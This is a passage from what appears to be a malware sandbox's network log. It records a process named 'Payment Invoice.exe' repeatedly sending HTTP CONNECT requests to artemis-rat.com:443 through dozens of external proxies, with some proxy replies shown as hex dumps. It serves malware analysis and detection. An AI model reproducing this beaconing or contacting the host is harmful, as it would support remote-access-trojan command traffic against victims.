                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:25.323879004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1816192.168.2.451906158.101.113.18807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.325582027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.386188030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.480171919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.532572985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.589225054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.589323997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.589333057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.589225054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1817192.168.2.45306272.169.67.61877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.361596107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.876722097 CET766INHTTP/1.0 514 Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported
                                                                Content-type: text/html
                                                                Content-length: 630
                                                                Data Raw: 3c 54 49 54 4c 45 3e 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 45 72 72 6f 72 20 28 35 31 34 29 20 2d 20 50 72 6f 78 69 65 64 20 48 54 54 50 53 20 52 65 71 75 65 73 74 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 54 49 54 4c 45 3e 3c 42 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 61 72 69 61 6c 20 63 6f 6c 6f 72 3d 23 33 36 34 32 61 32 3e 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 45 72 72 6f 72 20 28 35 31 34 29 20 2d 20 50 72 6f 78 69 65 64 20 48 54 54 50 53 20 52 65 71 75 65 73 74 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 66 6f 6e 74 3e 3c 2f 42 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 6e 6f 72 6d 61 6c 20 66 61 63 65 3d 61 72 69 61 6c 20 73 69 7a 65 3d 32 70 78 3e 3c 50 3e 54 68 65 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 73 65 63 75 72 65 20 72 65 71 75 65 73 74 73 20 28 48 54 54 50 53 29 20 66 72 6f 6d 20 61 20 62 72 6f 77 73 65 72 20 77 68 65 6e 3a 20 3c 50 3e 20 3c 55 4c 3e 3c 4c 49 3e 20 54 68 65 20 62 72 6f 77 73 65 72 20 69 73 20 70 72 6f 78 69 65 64 20 74 6f 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 66 6f 72 20 73 65 63 75 72 65 20 72 65 71 75 65 73 74 73 20 28 48 54 54 50 53 29 2c 20 61 6e 64 20 3c 4c 49 3e 20 54 68 65 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 77 69 74 68 20 61 20 70 72 6f 78 79 20 73 65 72 76 65 72 2c 20 61 6e 64 20 3c 4c 49 3e 20 53 53 4c 42 20 69 73 20 64 69 73 61 62 6c 65 64 20 3c 2f 55 4c 3e 3c 50 3e 20 54 6f 20 63 6f 72 72 65 63 74 20 74 68 69 73 20 70 72 6f 62 6c 65 6d 2c 20 79 6f 75 20 6d 75 73 74 20 72 65 6d 6f 76 65 20 74 68 65 20 70 72 6f 78 79 20 73 65 74 74 69 6e 67 73 20 66 72 6f 6d 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 50 3e 3c 2f 66 6f 6e 74 3e
                                                                Data Ascii: <TITLE>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</TITLE><B><font face=arial color=#3642a2>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</font></B><font style=normal face=arial size=2px><P>The Web Acceleration Client does not support secure requests (HTTPS) from a browser when: <P> <UL><LI> The browser is proxied to Web Acceleration Client for secure requests (HTTPS), and <LI> The Web Acceleration Client is not configured with a proxy server, and <LI> SSLB is disabled </UL><P> To correct this problem, you must remove the proxy settings from your browser.</P></font>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1818192.168.2.45191491.134.140.16025727076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.361649036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1819192.168.2.454303104.248.158.78472257076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.369575024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1820192.168.2.45185082.223.121.72154647076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.409961939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.537847996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.589453936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.674734116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.776770115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.776758909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.776734114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.776822090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1821192.168.2.454618142.54.226.21441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.410362005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1822192.168.2.451846178.128.82.105332257076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.422126055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.537847996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.589478970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.674741030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.776762962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.776757956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1823192.168.2.454606107.180.90.88631007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.426418066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.537853003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.589483976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.674761057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.777350903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.776964903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:13.776753902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:37.776766062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:25.808048010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1824192.168.2.45443498.181.137.8041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.426512003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1825192.168.2.453584192.252.216.8141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.426886082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1826192.168.2.45213572.252.4.4941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.446233034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1827192.168.2.451845115.127.28.1086747076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.479338884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.443197966 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1828192.168.2.45238468.169.60.22083807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.490607977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1829192.168.2.454994198.8.94.174390787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.490673065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1830192.168.2.45460154.36.122.16397137076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.490813017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1831192.168.2.452074213.136.79.177353587076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.490861893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.537981987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.589488029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.674772978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.777353048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1832192.168.2.451950102.212.252.562517076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.494600058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1833192.168.2.452119185.250.27.5431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.524270058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.538176060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.625356913 CET39INHTTP/1.0 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1834192.168.2.453547123.241.210.123807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.539196014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1835192.168.2.45457051.15.240.207163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:25.542344093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683028936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.731857061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.122884035 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 